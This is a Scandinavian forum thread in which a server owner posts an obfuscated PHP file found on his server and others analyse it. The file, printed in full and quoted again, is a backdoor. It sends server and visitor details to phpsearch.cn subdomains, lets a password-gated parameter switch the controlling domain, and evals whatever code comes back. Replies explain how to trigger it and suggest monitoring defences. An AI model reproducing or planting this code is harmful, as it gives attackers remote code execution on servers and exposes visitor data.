PHP Post

[retttilstephen]

Hei!
Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
Den er sannsynligvis lastet opp av en intern bruker på min server.

Takk!

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
($cu);eval($o);}; ?>

[Martin]

retttilstephen@gmail.com wrote:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.
>
> Takk!

Hvis du ikke selv har lavet den fil, eller har et eller andet cms/blog,
så ville jeg slette den IMMEDIATELY!

Det den gør, den kalder op til til en eller anden adresse, med en masse
oplysninger om dig, og din bruger

Gider ikke lige sidde og decode det, for at se hvor det er den kalder op til

>
> > $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
> $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:
> $SERVER_NAME);
> $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:
> $REQUEST_URI);
> $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
> $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:
> $QUERY_STRING);
> $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:
> $HTTP_REFERER);
> $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:
> $HTTP_USER_AGENT);
> $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:
> $REMOTE_ADDR);
> $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:
> $SCRIPT_FILENAME);
> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER
> ["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
> $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode
> ($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode
> ($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode
> ($i).".".base64_encode($j);
> $f=base64_decode("cGhwc2VhcmNoLmNu");
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];
> if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
> else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval
> ($c);
> else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
> curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close
> ($cu);eval($o);}; ?>

[Dan Storm]

retttilstephen@gmail.com skrev:
> Hei!
> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
> Den er sannsynligvis lastet opp av en intern bruker på min server.

Well, jeg er ikke bange af mig, så jeg har lige smidt det på serveren,
skilt det lidt ad og givet det et skud ;)

Den forsøger at sende en masse informationer omrking hvilken side du er
på videre til http://ads1.phpsearch.cn/
Besøger man siden får du en site der umiddelbart virker som om formålet
er at tjene penge via online reklamer.
For at du ikke skal få mistanke viser den så en 404 side som umiddelbart
skulle få det til at virke som om siden ikke er fundet (altså, som om
filen ikke eksisterer og dermed mindre chance for at du opdager den).

Men det lader ikke til at den er skadelig, men hvem gider at lægge
trafik til sådan noget... Anyways, en god opsætning gør at scriptet ikke
kan eksekveres effektivt.

--
Dan Storm - storm at err0r dot dk / http://err0r.dk/

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

[Stig Johansen]

Dan Storm wrote:

> retttilstephen@gmail.com skrev:
>> Hei!
>> Kan noen gi et hint om hva denne koden gjør for funksjon evt skade??:
>> Den er sannsynligvis lastet opp av en intern bruker på min server.

Ikke nødvendigvis. Den kan også være kommet ind ad andre veje.

> Den forsøger at sende en masse informationer omrking hvilken side du er
> på videre til http://ads1.phpsearch.cn/
Eller http://71.phpsearch.cn/
eller http://7.phpsearch.cn/

> Men det lader ikke til at den er skadelig,

Du har overset disse 2 småting:
eval($c);
og
eval($o);

Dvs. evt returneret PHP kode bliver udført.

> men hvem gider at lægge
> trafik til sådan noget...

Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
Formentlig alle intermidiate layers kører på inficerede servere (så
bagmændene ikke kan spores)

--
Med venlig hilsen
Stig Johansen

[Dan Storm]

Stig Johansen skrev:
>> Den forsøger at sende en masse informationer omrking hvilken side du er
>> på videre til http://ads1.phpsearch.cn/
> Eller http://71.phpsearch.cn/
> eller http://7.phpsearch.cn/

Så meget skilte jeg den heller ikke ad... :p

>> Men det lader ikke til at den er skadelig,
>
> Du har overset disse 2 småting:
> eval($c);
> og
> eval($o);
>
> Dvs. evt returneret PHP kode bliver udført.

Jeg kørte en var_dump() på det, men det lod ikke til at returnere noget?
Men igen, jeg kunne nok have skilt det mere ad.



> Det er ikke alle ejere af servere, der ved de lægger plads til sådan noget.
> Formentlig alle intermidiate layers kører på inficerede servere (så
> bagmændene ikke kan spores)

Ja, desværre... :/
En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
nyoprettede filer. Det virker måske lidt overkill, men idéen var god: på
den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
deface hans website. Well, jeg har jo ikke noget liggende for tiden, så
jeg har ikke lige taget højde for så meget...

--
Dan Storm - storm at err0r dot dk / http://err0r.dk/

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!

[Stig Johansen]

Dan Storm wrote:

>> Det er ikke alle ejere af servere, der ved de lægger plads til sådan
>> noget. Formentlig alle intermidiate layers kører på inficerede servere
>> (så bagmændene ikke kan spores)
>
> Ja, desværre... :/
> En kollega jeg har havde et cronjob til at tjekke en gang i døgnet for
> nyoprettede filer. Det virker måske lidt overkill,

Overhovedet ikke.
Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
samt SQL injection på MS SQLServer, og formålet er at køre _meget_
hyppigere.
http://w-o-p-r.dk/storm.monitor/index.asp

Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
nærmere inspireret af Botnettet Storm, og ikke dig :)

> men idéen var god: på
> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
> deface hans website.

Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
nettet.

--
Med venlig hilsen
Stig Johansen

[ScooterGrisen]

Her kan i se hvad den outputtet og sender: http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Den del af kildekoden hvor der står md5 det må vel være et krypteret
password er det ik ?
Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
øverste data på test1.php

Der var en der uploadet et php script til min hjemmeside som slettede
filer så hvis der var nogen der uploadet det der script så ville jeg
ikke have de kunne udfører det.

Jeg har gjort så php kode bliver vist som almindelig tekst på min
hjemmeside, så de kan uploade php men ikke udfører det.
Se f.eks: http://mentos.wep.dk/scooterhjemmeside/download/upload/test.php

[Stig Johansen]

ScooterGrisen wrote:

> Her kan i se hvad den outputtet og sender:
> http://mentos.wep.dk/scooterhjemmeside/php/test1.php

Det skal du nu ikke være sikker på.

> Den del af kildekoden hvor der står md5 det må vel være et krypteret
> password er det ik ?

Næsten, hashet 'password' er nok mere rigtigt.

> Ligesom at scriptet logger på phpsearch.cn og logger på og aflevere de
> øverste data på test1.php

Ikke nødvendigvis.
Bemærk linien her:
$f=base64_decode("cGhwc2VhcmNoLmNu");
Den sætter $f til phpsearch.cn initielt.

Men hvis vi kigger på linien:
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Medfører det, at hvis den bliver kaldt med den rigtige 'q', så bliver $f sat
til 'id'.

'Man' kan altså kalde scriptet med
scriptets_navn?q=&id=the.real.bad.domaine

Så vil $f indeholde the.real.bad.domaine og ikke phpsearch.cn.
Dermed vil den kalde, måske, http://71.the.real.bad.domaine/.. + data

Resultatet af den efterfølgende get.. eller curl.. vil blive eksekveret med
eval.

Forretningsgangen er at svineørerne finder et (nyt) domaine (navn).
Her lægger de den kode, de ønsker udført på din server.
Så konfigurerer man bot'erne til at udføre requests med disse data på de
servere, der ligger i deres 'dictionary'.

Nettoresultatet er, at den server, der indeholder skadelig kode, og kunne
være sporbar, ikke fremgår nogle steder, bortset fra serverens logfil.

Hvis man vel og mærket logger, gemmer, og analyserer Querystring (det, der
står efter ?).

--
Med venlig hilsen
Stig Johansen

[Stig Johansen]

Stig Johansen wrote:

> Men hvis vi kigger på linien:
> if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST
> ["q"])=="9123d0e5f518edcb75fd470d3bfa27c4") $f=$_REQUEST["id"];

Kom lige i tanke om, hvis der er nogen der ønsker at lege med ilden.
Der er vistnok md5 generatorer online, men ellers har jeg en lille en her:
http://w-o-p-r.dk/*.tools/*.md5.generator.asp

En md5 på the_evil giver:
0608a1c41eca47c6381ef94048203079

Hvis man indsætter det i if sætningen, så kan man teste scriptet med
?q=the_evil&id=det.domaine.du.vil.kalde

--
Med venlig hilsen
Stig Johansen

[Dan Storm]

Stig Johansen skrev:
> Overhovedet ikke.
> Jeg har leget lidt med et koncept til at overvåge både nye og ændrede filer
> samt SQL injection på MS SQLServer, og formålet er at køre _meget_
> hyppigere.
> http://w-o-p-r.dk/storm.monitor/index.asp

Jeg har godt nok været inde og kigge på den og jeg synes idéen er god;
jeg skal jo nok have noget overvågning installeret på mit nye website,
når jeg ikke engang får nosset mig færdig med den :p

>
> Nåh ja - Storm - jeg valgte at kalde det Storm Monitor, men det er nu
> nærmere inspireret af Botnettet Storm, og ikke dig :)

Det ville dog være beærende, men jeg havde nu heller ikke regnet med det
var tilfældet hehe ;)

>
>> men idéen var god: på
>> den måde kunne han jo hurtigt finde filer som eventuelt har forsøgt at
>> deface hans website.
>
> Præcis - og hvis alle gjorde det, havde vi ikke alt det lort liggende på
> nettet.

Jeg tror bestemt du har ret - mængden af defacertools og andet skidt
ville være betydeligt mindre, hvis man havde et godt system til at
advisere mod noget uventet. Tror også hellere jeg må komme igang med at
lave noget...


--
Dan Storm - storm at err0r dot dk / http://err0r.dk/

Tro ikke brugerne vil gøre noget for at undgå dit killfilter
- Så vigtig er du heller ikke!